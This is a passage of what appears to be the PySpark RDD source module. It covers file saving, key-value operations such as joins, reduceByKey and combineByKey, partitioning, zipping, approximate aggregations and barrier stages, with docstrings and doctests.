jconf, compressionCodecClass)
def saveAsSequenceFile(self, path, compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the L{org.apache.hadoop.io.Writable} types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
:param path: path to sequence file
:param compressionCodecClass: (None by default)
"""
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
path, compressionCodecClass)
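    # A minimal sketch, assuming an active SparkContext `sc` and a hypothetical
    # output path; primitive keys/values are converted to Writables automatically.
    #   sc.parallelize([(1, "a"), (2, "b")]).saveAsSequenceFile("/tmp/seq_demo")
    #   sorted(sc.sequenceFile("/tmp/seq_demo").collect())   # roughly [(1, u'a'), (2, u'b')]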
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect())
['1', '2', 'rdd', 'spark']
"""
if batchSize == 0:
ser = AutoBatchedSerializer(PickleSerializer())
else:
ser = BatchedSerializer(PickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
@ignore_unicode_prefix
def saveAsTextFile(self, path, compressionCodecClass=None):
"""
Save this RDD as a text file, using string representations of elements.
        :param path: path to text file
        :param compressionCodecClass: (None by default) string i.e.
"org.apache.hadoop.io.compress.GzipCodec"
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
Using compressionCodecClass
>>> tempFile3 = NamedTemporaryFile(delete=True)
>>> tempFile3.close()
>>> codec = "org.apache.hadoop.io.compress.GzipCodec"
>>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
>>> from fileinput import input, hook_compressed
>>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed))
>>> b''.join(result).decode('utf-8')
u'bar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, (unicode, bytes)):
x = unicode(x)
if isinstance(x, unicode):
x = x.encode("utf-8")
yield x
keyed = self.mapPartitionsWithIndex(func)
keyed._bypass_serializer = True
if compressionCodecClass:
compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
else:
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
.. note:: this method should only be used if the resulting data is expected
to be small, as all the data is loaded into the driver's memory.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda x: x[0])
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda x: x[1])
def reduceByKey(self, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative and commutative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
        The default partitioner is hash-partitioning.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions, partitionFunc)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative and commutative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
func = fail_on_stopiteration(func)
def reducePartition(iterator):
m = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(self, other, numPartitions=None):
"""
        Perform a full outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Similarly, for each element (k, w) in C{other}, the resulting RDD will
either contain all pairs (k, (v, w)) for v in C{self}, or the pair
(k, (None, w)) if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("c", 8)])
>>> sorted(x.fullOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
"""
return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
    # portable_hash is used as default, because the builtin hash of None
    # differs across machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> len(set(sets[0]).intersection(set(sets[1])))
0
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
partitioner = Partitioner(numPartitions, partitionFunc)
if self.partitioner == partitioner:
return self
# Transferring O(n) objects to Java is too expensive.
# Instead, we'll form the hash buckets in Python,
# transferring O(numPartitions) objects to Java.
# Each object is a (splitNumber, [objects]) pair.
# In order to avoid too huge objects, the objects are
# grouped into chunks.
outputSerializer = self.ctx._unbatched_serializer
limit = (_parse_memory(self.ctx._conf.get(
"spark.python.worker.memory", "512m")) / 2)
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
c, batch = 0, min(10 * numPartitions, 1000)
for k, v in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
c += 1
# check used memory and avg size of chunk of objects
if (c % 1000 == 0 and get_used_memory() > limit
or c > batch):
n, size = len(buckets), 0
for split in list(buckets.keys()):
yield pack_long(split)
d = outputSerializer.dumps(buckets[split])
del buckets[split]
yield d
size += len(d)
avg = int(size / n) >> 20
# let 1M < avg < 10M
if avg < 1:
batch *= 1.5
elif avg > 10:
batch = max(int(batch / 1.5), 1)
c = 0
for split, items in buckets.items():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True)
keyed._bypass_serializer = True
with SCCallSiteSync(self.context) as css:
pairRDD = self.ctx._jvm.PairwiseRDD(
keyed._jrdd.rdd()).asJavaPairRDD()
jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner))
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
rdd.partitioner = partitioner
return rdd
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None, partitionFunc=portable_hash):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C.
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one (e.g., merges
the lists)
To avoid memory allocation, both mergeValue and mergeCombiners are allowed to
modify and return their first argument instead of creating a new C.
In addition, users can control the partitioning of the output RDD.
.. note:: V and C can be different -- for example, one might group an RDD of type
(Int, Int) into an RDD of type (Int, List[Int]).
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 2)])
>>> def to_list(a):
... return [a]
...
>>> def append(a, b):
... a.append(b)
... return a
...
>>> def extend(a, b):
... a.extend(b)
... return a
...
>>> sorted(x.combineByKey(to_list, append, extend).collect())
[('a', [1, 2]), ('b', [1])]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
memory = self._memory_limit()
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combineLocally(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def _mergeCombiners(iterator):
merger = ExternalMerger(agg, memory, serializer)
merger.mergeCombiners(iterator)
return merger.items()
return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None,
partitionFunc=portable_hash):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
        a U and one operation for merging two U's. The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions, partitionFunc)
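    # A usage sketch mirroring the aggregate() doctest above, computing a per-key
    # (sum, count) pair; assumes an active SparkContext `sc`.
    #   rdd = sc.parallelize([("a", 1), ("a", 2), ("b", 5)])
    #   seqFunc = lambda acc, v: (acc[0] + v, acc[1] + 1)
    #   combFunc = lambda a, b: (a[0] + b[0], a[1] + b[1])
    #   sorted(rdd.aggregateByKey((0, 0), seqFunc, combFunc).collect())
    #   # roughly [('a', (3, 2)), ('b', (5, 1))]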
def foldByKey(self, zeroValue, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
        (e.g., 0 for addition, or 1 for multiplication).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> sorted(rdd.foldByKey(0, add).collect())
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions,
partitionFunc)
def _memory_limit(self):
return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None, partitionFunc=portable_hash):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with numPartitions partitions.
.. note:: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.groupByKey().mapValues(len).collect())
[('a', 2), ('b', 1)]
>>> sorted(rdd.groupByKey().mapValues(list).collect())
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
a.extend(b)
return a
memory = self._memory_limit()
serializer = self._jrdd_deserializer
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combine(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combine, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def groupByKey(it):
merger = ExternalGroupBy(agg, memory, serializer)
merger.mergeCombiners(it)
return merger.items()
return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable)
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda kv: ((kv[0], x) for x in f(kv[1]))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda kv: (kv[0], f(kv[1]))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))]
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
    # TODO: add variant with custom partitioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))]
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(self, withReplacement, fractions, seed=None):
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func(pair):
key, (val1, val2) = pair
return val1 and not val2
return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0])
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> [(x, list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())]
[(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
return self.coalesce(numPartitions, shuffle=True)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
if shuffle:
# Decrease the batch size in order to distribute evenly the elements across output
# partitions. Otherwise, repartition will possibly produce highly skewed partitions.
batchSize = min(10, self.ctx._batchSize or 1024)
ser = BatchedSerializer(PickleSerializer(), batchSize)
selfCopy = self._reserialize(ser)
jrdd_deserializer = selfCopy._jrdd_deserializer
jrdd = selfCopy._jrdd.coalesce(numPartitions, shuffle)
else:
jrdd_deserializer = self._jrdd_deserializer
jrdd = self._jrdd.coalesce(numPartitions, shuffle)
return RDD(jrdd, self.ctx, jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs with the
        first element in each RDD, second element in each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
def get_batch_size(ser):
if isinstance(ser, BatchedSerializer):
return ser.batchSize
return 1 # not batched
def batch_as(rdd, batchSize):
return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize))
my_batch = get_batch_size(self._jrdd_deserializer)
other_batch = get_batch_size(other._jrdd_deserializer)
if my_batch != other_batch or not my_batch:
# use the smallest batchSize for both of them
batchSize = min(my_batch, other_batch)
if batchSize <= 0:
# auto batched or unlimited
batchSize = 100
other = batch_as(other, batchSize)
self = batch_as(self, batchSize)
if self.getNumPartitions() != other.getNumPartitions():
raise ValueError("Can only zip with RDD which has the same number of partitions")
# There will be an Exception in JVM if there are different number
# of items in each partitions.
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def zipWithIndex(self):
"""
Zips this RDD with its element indices.
The ordering is first based on the partition index and then the
ordering of items within each partition. So the first item in
the first partition gets index 0, and the last item in the last
partition receives the largest index.
This method needs to trigger a spark job when this RDD contains
        more than one partition.
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
[('a', 0), ('b', 1), ('c', 2), ('d', 3)]
"""
starts = [0]
if self.getNumPartitions() > 1:
nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
for i in range(len(nums) - 1):
starts.append(starts[-1] + nums[i])
def func(k, it):
for i, v in enumerate(it, starts[k]):
yield v, i
return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self):
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions. So there may exist gaps, but this
method won't trigger a spark job, which is different from
        L{zipWithIndex}.
>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
def func(k, it):
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
def name(self):
"""
Return the name of this RDD.
"""
n = self._jrdd.name()
if n:
return n
@ignore_unicode_prefix
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1, 2])
>>> rdd1.setName('RDD1').name()
u'RDD1'
"""
self._jrdd.setName(name)
return self
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if debug_string:
return debug_string.encode('utf-8')
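    # The returned description is utf-8 encoded bytes, so a typical inspection,
    # assuming an active SparkContext `sc`, looks roughly like:
    #   print(sc.parallelize([1, 2]).map(str).toDebugString().decode("utf-8"))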
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
def lookup(self, key):
"""
Return the list of values in the RDD for key `key`. This operation
is done efficiently if the RDD has a known partitioner by only
searching the partition that the key maps to.
>>> l = range(1000)
>>> rdd = sc.parallelize(zip(l, l), 10)
>>> rdd.lookup(42) # slow
[42]
>>> sorted = rdd.sortByKey()
>>> sorted.lookup(42) # fast
[42]
>>> sorted.lookup(1024)
[]
>>> rdd2 = sc.parallelize([(('a', 'b'), 'c')]).groupByKey()
>>> list(rdd2.lookup(('a', 'b'))[0])
['c']
"""
values = self.filter(lambda kv: kv[0] == key).values()
if self.partitioner is not None:
return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)])
return values.collect()
def _to_java_object_rdd(self):
""" Return a JavaRDD of Object by unpickling
        It will convert each Python object into a Java object via Pyrolite, whether
        or not the RDD is serialized in batches.
"""
rdd = self._pickled()
return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
def countApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate version of count() that returns a potentially incomplete
result within a timeout, even if not all tasks have finished.
>>> rdd = sc.parallelize(range(1000), 10)
>>> rdd.countApprox(1000, 1.0)
1000
"""
drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
return int(drdd.sumApprox(timeout, confidence))
def sumApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the sum within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000))
>>> abs(rdd.sumApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the mean within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000)) / 1000.0
>>> abs(rdd.meanApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.map(float)._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self, relativeSD=0.05):
"""
.. note:: Experimental
Return approximate number of distinct elements in the RDD.
The algorithm used is based on streamlib's implementation of
`"HyperLogLog in Practice: Algorithmic Engineering of a State
of The Art Cardinality Estimation Algorithm", available here
<https://doi.org/10.1145/2452376.2452456>`_.
:param relativeSD: Relative accuracy. Smaller values create
counters that require more space.
It must be greater than 0.000017.
>>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
>>> 900 < n < 1100
True
>>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
>>> 16 < n < 24
True
"""
if relativeSD < 0.000017:
raise ValueError("relativeSD should be greater than 0.000017")
# the hash space in Java is 2^32
hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self):
"""
Return an iterator that contains all of the elements in this RDD.
The iterator will consume as much memory as the largest partition in this RDD.
>>> rdd = sc.parallelize(range(10))
>>> [x for x in rdd.toLocalIterator()]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
with SCCallSiteSync(self.context) as css:
sock_info = self.ctx._jvm.PythonRDD.toLocalIteratorAndServe(self._jrdd.rdd())
return _local_iterator_from_socket(sock_info, self._jrdd_deserializer)
def barrier(self):
"""
.. note:: Experimental
Marks the current stage as a barrier stage, where Spark must launch all tasks together.
In case of a task failure, instead of only restarting the failed task, Spark will abort the
entire stage and relaunch all tasks for this stage.
The barrier execution mode feature is experimental and it only handles limited scenarios.
Please read the linked SPIP and design docs to understand the limitations and future plans.
:return: an :class:`RDDBarrier` instance that provides actions within a barrier stage.
.. seealso:: :class:`BarrierTaskContext`
.. seealso:: `SPIP: Barrier Execution Mode
<http://jira.apache.org/jira/browse/SPARK-24374>`_
.. seealso:: `Design Doc <https://jira.apache.org/jira/browse/SPARK-24582>`_
.. versionadded:: 2.4.0
"""
return RDDBarrier(self)
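    # A hedged sketch of how a barrier stage is typically combined with
    # BarrierTaskContext, assuming an active SparkContext `sc` (Spark 2.4+):
    #   from pyspark import BarrierTaskContext
    #   def sync_and_report(iterator):
    #       ctx = BarrierTaskContext.get()
    #       ctx.barrier()                  # wait until every task in the stage arrives here
    #       yield ctx.partitionId()
    #   sc.parallelize(range(4), 4).barrier().mapPartitions(sync_and_report).collect()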
def _is_barrier(self):
"""
Whether this RDD is in a barrier stage.
"""
return self._jrdd.rdd().isBarrier()
def _prepare_for_python_RDD(sc, command):
# the serialized command will be compressed by broadcast
ser = CloudPickleSerializer()
pickled_command = ser.dumps(command)
if len(pickled_command) > (1 << 20): # 1M
# The broadcast will have same life cycle as created PythonRDD
broadcast = sc.broadcast(pickled_command)
pickled_command = ser.dumps(broadcast)
broadcast_vars = [x._jbroadcast for x in sc._pickled_broadcast_vars]
sc._pickled_broadcast_vars.clear()
return pickled_command, broadcast_vars, sc.environment, sc._python_includes
def _wrap_function(sc, func, deserializer, serializer, profiler=None):
assert deserializer, "deserializer should not be empty"
assert serializer, "serializer should not be empty"
command = (func, profiler, deserializer, serializer)
pickled_command, broadcast_vars, env, includes = _prepare_for_python_RDD(sc, command)
return sc._jvm.PythonFunction(bytearray(pickled_command), env, includes, sc.pythonExec,
sc.pythonVer, broadcast_vars, sc._javaAccumulator)
class RDDBarrier(object):
"""
.. note:: Experimental
Wraps an RDD in a barrier stage, which forces Spark to launch tasks of this stage together.
:class:`RDDBarrier` instances are created by :func:`RDD.barrier`.
.. versionadded:: 2.4.0
"""
def __init__(self, rdd):
self.rdd = rdd
